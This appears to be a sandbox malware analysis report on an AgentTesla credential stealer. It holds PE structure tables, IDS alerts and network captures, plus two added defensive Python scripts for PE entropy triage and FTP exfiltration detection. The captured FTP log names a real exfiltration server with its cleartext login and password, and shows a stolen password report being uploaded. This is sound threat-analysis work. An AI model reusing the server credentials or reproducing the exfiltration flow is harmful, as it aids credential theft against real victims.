                                   Entrypoint 0x49e9de is ImageBase 0x400000 + RVA 0x9e9de, just past the import directory (RVA 0x9e98c, size 0x4f). The jmp target 0x00402000 is ImageBase + the IAT (RVA 0x2000, 8 bytes: one thunk plus the null terminator), whose only entry is mscoree.dll!_CorExeMain. The native entry point is therefore the stock CLR bootstrap stub; all program logic is managed IL, and the .text entropy of 7.94 indicates that most of it is packed or encrypted until runtime.
                                   Name | Virtual Address | Virtual Size | Is in Section
                                   IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9e98c | 0x4f | .text
                                   IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa0000 | 0x600 | .rsrc
                                   IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa2000 | 0xc | .reloc
                                   IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                   IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                   IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                   Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                   .text | 0x2000 | 0x9c9e4 | 0x9ca00 | cfa23ddeb6805e192669529bccf6d3e4 | False | 0.9534913083599361 | data | 7.936637319472689 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                   .rsrc | 0xa0000 | 0x600 | 0x600 | 8269ded43569c3c82074390c2d2ed468 | False | 0.431640625 | data | 4.114834708760093 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                   .reloc | 0xa2000 | 0xc | 0x200 | dd0699bc23d08449938e566fa2472dd5 | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                   Note: .text accounts for 0x9ca00 of the 0x9d400-byte file (about 99.6%) at an entropy of 7.94 and a ZLIB complexity of 0.95, i.e. it is essentially incompressible. An unpacked .NET assembly's .text (IL plus metadata) is typically well below 7, so the section is dominated by a packed or encrypted payload rather than by readable IL.
                                   Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                   RT_VERSION | 0xa0090 | 0x32c | data | | | 0.4433497536945813
                                   RT_MANIFEST | 0xa03cc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                                   DLL | Import
                                   mscoree.dll | _CorExeMain
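The static checks that the tables above encode (a CLR header in the COM descriptor directory, an entry point that is just a jmp through the IAT, a near-incompressible executable section) can be reproduced with nothing but the Python standard library. The script below is an added example, not part of the Joe Sandbox report and not the sample's code. It builds a constructed stand-in image with the same layout as the report's sample (IAT at RVA 0x2000, CLR header at 0x2008, "jmp dword ptr [0x402000]" stub, high-entropy .text) scaled down to a 0x1000-byte section filled with seeded random bytes, and parses it; the stand-in has no import table or metadata, so the parser identifies the trampoline by its target address, not by the import name. The 7.0 entropy threshold is an assumption chosen for this example.

```python
"""Stdlib-only static triage of a PE32 image: reads the data directories,
section table and entry-point bytes, computes per-section Shannon entropy
and applies the checks that matter for a packed .NET dropper."""
import math
import random
import struct

DIR_IAT = 12             # IMAGE_DIRECTORY_ENTRY_IAT
DIR_COM_DESCRIPTOR = 14  # IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR (CLR header)
IMAGE_SCN_MEM_EXECUTE = 0x20000000


def shannon_entropy(data: bytes) -> float:
    """Bits per byte over the raw bytes: 0.0 for empty input, 8.0 maximum."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe32(blob: bytes) -> dict:
    """Return image base, entry point, IAT/CLR directories, sections and the
    target of an `FF 25` (jmp dword ptr [abs32]) stub at the entry point."""
    if blob[:2] != b"MZ":
        raise ValueError("no DOS header")
    pe = struct.unpack_from("<I", blob, 0x3C)[0]            # e_lfanew
    if blob[pe:pe + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    nsec = struct.unpack_from("<H", blob, pe + 6)[0]         # NumberOfSections
    opt_size = struct.unpack_from("<H", blob, pe + 20)[0]    # SizeOfOptionalHeader
    opt = pe + 24
    if struct.unpack_from("<H", blob, opt)[0] != 0x10B:
        raise ValueError("not PE32 (PE32+ field offsets differ; not handled here)")
    entry_rva = struct.unpack_from("<I", blob, opt + 16)[0]
    image_base = struct.unpack_from("<I", blob, opt + 28)[0]
    ndirs = struct.unpack_from("<I", blob, opt + 92)[0]
    dirs = [struct.unpack_from("<II", blob, opt + 96 + 8 * i) for i in range(ndirs)]

    sections = {}
    for i in range(nsec):
        name, vsize, va, rawsize, rawptr, _, _, _, _, flags = struct.unpack_from(
            "<8sIIIIIIHHI", blob, opt + opt_size + 40 * i)
        raw = blob[rawptr:rawptr + rawsize]
        sections[name.rstrip(b"\0").decode()] = {
            "va": va, "vsize": vsize, "rawptr": rawptr, "rawsize": rawsize,
            "executable": bool(flags & IMAGE_SCN_MEM_EXECUTE),
            "entropy": shannon_entropy(raw),
        }

    def rva_to_offset(rva: int) -> int:
        for s in sections.values():
            if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
                return s["rawptr"] + (rva - s["va"])
        raise ValueError(f"RVA {rva:#x} is in no section")

    ep = rva_to_offset(entry_rva)
    stub_target = None
    if blob[ep:ep + 2] == b"\xff\x25":                       # jmp dword ptr [imm32]
        stub_target = struct.unpack_from("<I", blob, ep + 2)[0]

    def directory(idx: int):
        return dirs[idx] if idx < len(dirs) else (0, 0)

    return {
        "image_base": image_base,
        "entry_rva": entry_rva,
        "iat_rva": directory(DIR_IAT)[0],
        "clr_header_rva": directory(DIR_COM_DESCRIPTOR)[0],
        "entry_stub_target": stub_target,
        "sections": sections,
    }


def triage(info: dict, entropy_threshold: float = 7.0) -> list:
    """Findings in the spirit of the report's static section."""
    findings = []
    if info["clr_header_rva"]:
        findings.append(f"managed image: CLR header at RVA {info['clr_header_rva']:#x}")
    if (info["entry_stub_target"] is not None
            and info["entry_stub_target"] == info["image_base"] + info["iat_rva"]):
        findings.append("entry point is jmp dword ptr [IAT+0]: the native entry is a "
                        "trampoline into the first import (mscoree!_CorExeMain on a .NET exe)")
    for name, s in info["sections"].items():
        if s["executable"] and s["entropy"] > entropy_threshold:
            findings.append(f"{name}: entropy {s['entropy']:.2f} in an executable section, "
                            "consistent with a packed or encrypted payload")
    return findings


def build_sample_pe(seed: int = 1) -> bytes:
    """Constructed stand-in (not the analysed sample): same layout as the report
    at small scale. No import table or metadata; it exists to exercise the parser."""
    rnd = random.Random(seed)
    image_base, file_align, sect_align = 0x400000, 0x200, 0x1000
    text_rva, text_size, text_raw = 0x2000, 0x1000, 0x200
    rsrc_rva, rsrc_size, rsrc_raw = 0x3000, 0x200, text_raw + text_size
    stub_off = 0xF00
    entry_rva = text_rva + stub_off

    text = bytearray(text_size)
    struct.pack_into("<II", text, 0, text_rva + 0x50, 0)   # IAT: one thunk + terminator (placeholder)
    struct.pack_into("<IHH", text, 8, 0x48, 2, 5)           # CLR header: cb=0x48, runtime 2.5
    for i in range(0x50, stub_off):                          # stands in for the packed blob
        text[i] = rnd.getrandbits(8)
    text[stub_off:stub_off + 6] = b"\xff\x25" + struct.pack("<I", image_base + text_rva)

    dos = b"MZ" + bytes(0x3A) + struct.pack("<I", 0x80)      # e_lfanew at 0x3C
    dos += bytes(0x80 - len(dos))
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 2, 0x66739ED9, 0, 0, 224, 0x0102)
    opt = struct.pack(
        "<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6,
        0x10B, 48, 0,                                        # PE32 magic, linker 48.0
        text_size, rsrc_size, 0, entry_rva, text_rva, rsrc_rva, image_base, sect_align, file_align,
        4, 0, 0, 0, 4, 0,                                    # OS / image / subsystem versions
        0, 0x4000, 0x200, 0,                                 # Win32 ver, SizeOfImage, SizeOfHeaders, checksum
        2, 0x8540,                                           # GUI; DYNAMIC_BASE|NX_COMPAT|NO_SEH|TS_AWARE
        0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    dirs = [(0, 0)] * 16
    dirs[DIR_IAT] = (text_rva, 8)
    dirs[DIR_COM_DESCRIPTOR] = (text_rva + 8, 0x48)
    opt += b"".join(struct.pack("<II", *d) for d in dirs)
    secs = struct.pack("<8sIIIIIIHHI", b".text", text_size, text_rva, text_size, text_raw,
                       0, 0, 0, 0, 0x60000020)
    secs += struct.pack("<8sIIIIIIHHI", b".rsrc", rsrc_size, rsrc_rva, rsrc_size, rsrc_raw,
                        0, 0, 0, 0, 0x40000040)
    headers = dos + coff + opt + secs
    headers += bytes(text_raw - len(headers))
    return bytes(headers) + bytes(text) + bytes(rsrc_size)


if __name__ == "__main__":
    for line in triage(parse_pe32(build_sample_pe())):
        print("-", line)
```

Run against a real file by passing its bytes to parse_pe32 instead of build_sample_pe; on the report's sample the three findings would read CLR header at 0x2008, stub target 0x402000 = 0x400000 + 0x2000, and .text at 7.94. The entropy is computed over the raw section bytes, which is why the 0x200-byte .reloc with 0xc bytes of content scores near zero in the report.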
                                   Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                   06/20/24-14:23:09.712885 | TCP | 2855542 | ETPRO TROJAN Agent Tesla CnC Exfil Activity | 49709 | 43985 | 192.168.2.5 | 108.179.234.136
                                   06/20/24-14:23:09.311887 | TCP | 2029927 | ET TROJAN AgentTesla Exfil via FTP | 49708 | 21 | 192.168.2.5 | 108.179.234.136
                                   06/20/24-14:23:09.712885 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49709 | 43985 | 192.168.2.5 | 108.179.234.136
                                   Note: SID 2029927 fired on the control channel (port 21) at the instant of the STOR command; SIDs 2855542 and 2851779 fired on the PASV data connection (port 43985) that carried the uploaded report. No Telegram traffic appears in the capture (the only DNS lookup is ftp.wapination.net), so the Telegram-exfil alert is a content match on the report body, not evidence of a second exfiltration channel.
                                   Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                   Jun 20, 2024 14:23:07.959564924 CEST | 49708 | 21 | 192.168.2.5 | 108.179.234.136
                                   Jun 20, 2024 14:23:07.964571953 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.5
                                   Jun 20, 2024 14:23:07.964647055 CEST | 49708 | 21 | 192.168.2.5 | 108.179.234.136
                                   Jun 20, 2024 14:23:08.495738029 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.5
                                   Jun 20, 2024 14:23:08.495973110 CEST | 49708 | 21 | 192.168.2.5 | 108.179.234.136
                                   Jun 20, 2024 14:23:08.500859022 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.5
                                   Jun 20, 2024 14:23:08.611702919 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.5
                                   Jun 20, 2024 14:23:08.611854076 CEST | 49708 | 21 | 192.168.2.5 | 108.179.234.136
                                   Jun 20, 2024 14:23:08.616686106 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.5
                                   Jun 20, 2024 14:23:08.806467056 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.5
                                   Jun 20, 2024 14:23:08.806607008 CEST | 49708 | 21 | 192.168.2.5 | 108.179.234.136
                                   Jun 20, 2024 14:23:08.811480999 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.5
                                   Jun 20, 2024 14:23:08.925967932 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.5
                                   Jun 20, 2024 14:23:08.926120996 CEST | 49708 | 21 | 192.168.2.5 | 108.179.234.136
                                   Jun 20, 2024 14:23:08.931056976 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.5
                                   Jun 20, 2024 14:23:09.041934967 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.5
                                   Jun 20, 2024 14:23:09.042676926 CEST | 49708 | 21 | 192.168.2.5 | 108.179.234.136
                                   Jun 20, 2024 14:23:09.047542095 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.5
                                   Jun 20, 2024 14:23:09.158538103 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.5
                                   Jun 20, 2024 14:23:09.166553020 CEST | 49708 | 21 | 192.168.2.5 | 108.179.234.136
                                   Jun 20, 2024 14:23:09.171681881 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.5
                                   Jun 20, 2024 14:23:09.282438993 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.5
                                   Jun 20, 2024 14:23:09.304318905 CEST | 49709 | 43985 | 192.168.2.5 | 108.179.234.136
                                   Jun 20, 2024 14:23:09.310246944 CEST | 43985 | 49709 | 108.179.234.136 | 192.168.2.5
                                   Jun 20, 2024 14:23:09.311553001 CEST | 49709 | 43985 | 192.168.2.5 | 108.179.234.136
                                   Jun 20, 2024 14:23:09.311887026 CEST | 49708 | 21 | 192.168.2.5 | 108.179.234.136
                                   Jun 20, 2024 14:23:09.318975925 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.5
                                   Jun 20, 2024 14:23:09.712625027 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.5
                                   Jun 20, 2024 14:23:09.712884903 CEST | 49709 | 43985 | 192.168.2.5 | 108.179.234.136
                                   Jun 20, 2024 14:23:09.712948084 CEST | 49709 | 43985 | 192.168.2.5 | 108.179.234.136
                                   Jun 20, 2024 14:23:09.717772007 CEST | 43985 | 49709 | 108.179.234.136 | 192.168.2.5
                                   Jun 20, 2024 14:23:09.718241930 CEST | 43985 | 49709 | 108.179.234.136 | 192.168.2.5
                                   Jun 20, 2024 14:23:09.718302965 CEST | 49709 | 43985 | 192.168.2.5 | 108.179.234.136
                                   Jun 20, 2024 14:23:09.756690025 CEST | 49708 | 21 | 192.168.2.5 | 108.179.234.136
                                   Jun 20, 2024 14:23:09.851047993 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.5
                                   Jun 20, 2024 14:23:09.897192955 CEST | 49708 | 21 | 192.168.2.5 | 108.179.234.136
                                   Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                   Jun 20, 2024 14:23:07.629895926 CEST | 60267 | 53 | 192.168.2.5 | 1.1.1.1
                                   Jun 20, 2024 14:23:07.953522921 CEST | 53 | 60267 | 1.1.1.1 | 192.168.2.5
                                   Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                   Jun 20, 2024 14:23:07.629895926 CEST | 192.168.2.5 | 1.1.1.1 | 0xd8cc | Standard query (0) | ftp.wapination.net | A (IP address) | IN (0x0001) | false
                                   Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                   Jun 20, 2024 14:23:07.953522921 CEST | 1.1.1.1 | 192.168.2.5 | 0xd8cc | No error (0) | ftp.wapination.net | wapination.net | | CNAME (Canonical name) | IN (0x0001) | false
                                   Jun 20, 2024 14:23:07.953522921 CEST | 1.1.1.1 | 192.168.2.5 | 0xd8cc | No error (0) | wapination.net | | 108.179.234.136 | A (IP address) | IN (0x0001) | false
                                   Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                                   Jun 20, 2024 14:23:08.495738029 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.5 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                                                                                       220-You are user number 3 of 150 allowed.
                                                                                                                       220-Local time is now 07:23. Server port: 21.
                                                                                                                       220-IPv6 connections are also welcome on this server.
                                                                                                                       220 You will be disconnected after 15 minutes of inactivity.
                                   Jun 20, 2024 14:23:08.495973110 CEST | 49708 | 21 | 192.168.2.5 | 108.179.234.136 | USER pop@wapination.net
                                   Jun 20, 2024 14:23:08.611702919 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.5 | 331 User pop@wapination.net OK. Password required
                                   Jun 20, 2024 14:23:08.611854076 CEST | 49708 | 21 | 192.168.2.5 | 108.179.234.136 | PASS sync@#1235
                                   Jun 20, 2024 14:23:08.806467056 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.5 | 230 OK. Current restricted directory is /
                                   Jun 20, 2024 14:23:08.925967932 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.5 | 504 Unknown command
                                   Jun 20, 2024 14:23:08.926120996 CEST | 49708 | 21 | 192.168.2.5 | 108.179.234.136 | PWD
                                   Jun 20, 2024 14:23:09.041934967 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.5 | 257 "/" is your current location
                                   Jun 20, 2024 14:23:09.042676926 CEST | 49708 | 21 | 192.168.2.5 | 108.179.234.136 | TYPE I
                                   Jun 20, 2024 14:23:09.158538103 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.5 | 200 TYPE is now 8-bit binary
                                   Jun 20, 2024 14:23:09.166553020 CEST | 49708 | 21 | 192.168.2.5 | 108.179.234.136 | PASV
                                   Jun 20, 2024 14:23:09.282438993 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.5 | 227 Entering Passive Mode (108,179,234,136,171,209)
                                   Jun 20, 2024 14:23:09.311887026 CEST | 49708 | 21 | 192.168.2.5 | 108.179.234.136 | STOR PW_user-675052_2024_06_20_08_23_07.html
                                   Jun 20, 2024 14:23:09.712625027 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.5 | 150 Accepted data connection
                                   Jun 20, 2024 14:23:09.851047993 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.5 | 226-File successfully transferred
                                                                                                                       226 0.117 seconds (measured here), 2.68 Kbytes per second
                                   Notes: the server advertises TLS in its banner but the client never sends AUTH TLS, so the exfil account's credentials (USER pop@wapination.net / PASS sync@#1235) travel in cleartext and are recoverable from the capture. The 227 reply's tuple (171,209) decodes to data port 171*256+209 = 43985, which is the port of the 49709/43985 connection in the packet list and of the two data-channel IDS alerts. The client command that drew the 504 reply (the packet at 14:23:08.806607) is not decoded in the report. The STOR name follows the AgentTesla report convention PW_user-<id>_<YYYY>_<MM>_<DD>_<HH>_<MM>_<SS>.html, stamped with the victim's local time (08:23:07, matching the sandbox's 08:23 start time); from the server's own figures the uploaded password report was only about 320 bytes.
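The exchange above is small enough to turn into detection logic. The script below is an added example, not part of the report: it replays the control-channel lines (re-entered as a constructed list of client and server messages) through a state machine that records the login, decodes the PASV endpoint exactly as the notes do, and matches uploaded filenames against the AgentTesla report pattern. The KL_ and SC_ prefixes in the pattern are the family's keylog and screenshot report names and do not appear on this page; the absence-of-AUTH-TLS check is the rule this example adds for the cleartext-credential finding.

```python
"""Reconstructs an FTP control-channel exchange from a command log (what a
sandbox prints, or tshark's ftp.request/ftp.response fields) and flags the
AgentTesla pattern: cleartext login, PASV data channel, STOR of an HTML
credential report."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed from the control-channel log above: ">" = client, "<" = server.
SESSION = [
    ("<", "220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------"),
    ("<", "220 You will be disconnected after 15 minutes of inactivity."),
    (">", "USER pop@wapination.net"),
    ("<", "331 User pop@wapination.net OK. Password required"),
    (">", "PASS sync@#1235"),
    ("<", "230 OK. Current restricted directory is /"),
    ("<", "504 Unknown command"),
    (">", "PWD"),
    ("<", '257 "/" is your current location'),
    (">", "TYPE I"),
    ("<", "200 TYPE is now 8-bit binary"),
    (">", "PASV"),
    ("<", "227 Entering Passive Mode (108,179,234,136,171,209)"),
    (">", "STOR PW_user-675052_2024_06_20_08_23_07.html"),
    ("<", "150 Accepted data connection"),
    ("<", "226 File successfully transferred"),
]

PASV_RE = re.compile(r"\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)")
# AgentTesla report names: <kind>_user-<id>_<YYYY>_<MM>_<DD>_<HH>_<MM>_<SS>.html.
# PW_ (passwords) is what this sample sent; KL_ (keylog) and SC_ (screenshot)
# are the family's other report prefixes (not on this page).
REPORT_RE = re.compile(
    r"^(PW|KL|SC)_user-(\d+)_(\d{4})_(\d{2})_(\d{2})_(\d{2})_(\d{2})_(\d{2})\.html$")


@dataclass
class FtpSession:
    user: Optional[str] = None
    password: Optional[str] = None
    auth_tls: bool = False
    logged_in: bool = False
    data_endpoint: Optional[Tuple[str, int]] = None
    uploads: List[str] = field(default_factory=list)
    completed: int = 0
    findings: List[str] = field(default_factory=list)


def parse_pasv(reply: str) -> Optional[Tuple[str, int]]:
    """227 (h1,h2,h3,h4,p1,p2) -> ('h1.h2.h3.h4', p1*256 + p2)."""
    m = PASV_RE.search(reply)
    if not m:
        return None
    h1, h2, h3, h4, p1, p2 = (int(x) for x in m.groups())
    return f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2


def analyze_ftp_session(lines: List[Tuple[str, str]]) -> FtpSession:
    """Walk the exchange once, then derive findings from the recorded state."""
    s = FtpSession()
    for direction, text in lines:
        if direction == ">":
            verb, _, arg = text.partition(" ")
            verb = verb.upper()
            if verb == "USER":
                s.user = arg
            elif verb == "PASS":
                s.password = arg
            elif verb == "AUTH" and arg.upper() in ("TLS", "SSL"):
                s.auth_tls = True          # control channel encrypted from here on
            elif verb == "STOR":
                s.uploads.append(arg)
        else:
            code = text[:3]
            if code == "230":
                s.logged_in = True
            elif code == "227":
                s.data_endpoint = parse_pasv(text)
            elif code == "226":
                s.completed += 1

    if s.password is not None and not s.auth_tls:
        s.findings.append(
            f"cleartext FTP login as {s.user!r}: no AUTH TLS before USER/PASS, "
            "so the exfil account's password is recoverable from the capture")
    for name in s.uploads:
        m = REPORT_RE.match(name)
        if m:
            kind, victim, y, mo, d, h, mi, sec = m.groups()
            s.findings.append(
                f"AgentTesla {kind}_ report for victim id {victim} generated "
                f"{y}-{mo}-{d} {h}:{mi}:{sec} (victim local time)")
    if s.data_endpoint and s.uploads and s.completed:
        ip, port = s.data_endpoint
        s.findings.append(
            f"{s.completed} upload(s) completed over PASV data channel {ip}:{port}; "
            "that port, not 21, is where data-channel IDS alerts fire")
    return s


if __name__ == "__main__":
    for line in analyze_ftp_session(SESSION).findings:
        print("-", line)
```

Feeding it a session that opens with AUTH TLS produces no credential finding because USER/PASS would not be visible in the log at all; the point of the check is that this sample's FTP library never negotiated TLS even though the server offered it.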


                                  Target ID:0
                                  Start time:08:23:04
                                  Start date:20/06/2024
                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe"
                                  Imagebase:0xc70000
                                  File size:644'096 bytes
                                  MD5 hash:B3DB9023FE215F9CC7EA9DC71387F111
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2051691772.000000000403D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2051691772.000000000403D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:low
                                  Has exited:true

                                  Target ID:3
                                  Start time:08:23:05
                                  Start date:20/06/2024
                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe"
                                  Imagebase:0xe60000
                                  File size:644'096 bytes
                                  MD5 hash:B3DB9023FE215F9CC7EA9DC71387F111
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.3285205060.00000000032FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3283129329.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.3283129329.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3285205060.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.3285205060.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:low
                                  Has exited:false


                                    Execution Graph

                                    Execution Coverage:11.2%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:0%
                                    Total number of Nodes:104
                                    Total number of Limit Nodes:11
                                     execution_graph: [node and edge dump of the rendered graph; not recoverable as text. API calls reached in the graph: CallWindowProcW, CreateWindowExW, PostMessageW, DuplicateHandle, GetCurrentProcess, GetCurrentThread, GetCurrentThreadId, GetModuleHandleW, LoadLibraryExW.]
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: (_]q$(_]q$,aq$4c]q$4c]q$Haq$Nv\q$$]q$$]q$$]q$c]q$c]q
                                    • API String ID: 0-67377238
                                    • Opcode ID: 6a7f27795eb16b09a6770e0ff293eeaa6f94a24d15712cdc0deb4ccdc961f80b
                                    • Instruction ID: e2bad9f56821091a91fdb2b096bcb6b6d4dd8434fd666901907a6d353487d0a2
                                    • Opcode Fuzzy Hash: 6a7f27795eb16b09a6770e0ff293eeaa6f94a24d15712cdc0deb4ccdc961f80b
                                    • Instruction Fuzzy Hash: 13829460B80525CFCB59EFBD885062D66E7BFCCB01B60496DD04ADB394EE64CC458FA2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: (o]q$4']q$4']q$4']q$4']q$4']q$4']q$4|bq$4|bq$$]q
                                    • API String ID: 0-3618750947
                                    • Opcode ID: 2384e5b7de873d5a33f7ad886fc96eb8bec68316f70bca89c39edabc7b50a957
                                    • Instruction ID: 2eddc4a75e2f4af32aee3759115235d454e27fccd6a5cb9803e5e0e28b367b79
                                    • Opcode Fuzzy Hash: 2384e5b7de873d5a33f7ad886fc96eb8bec68316f70bca89c39edabc7b50a957
                                    • Instruction Fuzzy Hash: 9F43D974A00219CFCB24DFA8C998A9DBBB2FF89311F158599D409AB361DB34ED81CF51
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Te]q$Te]q$Te]q$Te]q$Te]q$Te]q$$]q$$]q$$]q$$]q
                                    • API String ID: 0-3613213995
                                    • Opcode ID: e7fe003e8c7261b8bc0633636438667362112dc50e0ba333449ae8365e8e1e5d
                                    • Instruction ID: 4a0ea375784e16029f9f4a54844dd4fcae429b8a8be70a73f7195f27fa56004e
                                    • Opcode Fuzzy Hash: e7fe003e8c7261b8bc0633636438667362112dc50e0ba333449ae8365e8e1e5d
                                    • Instruction Fuzzy Hash: 7112D031B442498FDB048BBCD8597AD7FA2BB8D712F24885DE901ABB85DA348C41CF95
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: (o]q$(o]q$,aq$,aq$Haq
                                    • API String ID: 0-2157538030
                                    • Opcode ID: 1acbe9be502ee62f08061cc96ba02d6fed6bb505b1ded519fb09d078041902c1
                                    • Instruction ID: ae893116ac5b68e6a7708e34b329228153e5df64a69c17c26fb44f78e0d30de9
                                    • Opcode Fuzzy Hash: 1acbe9be502ee62f08061cc96ba02d6fed6bb505b1ded519fb09d078041902c1
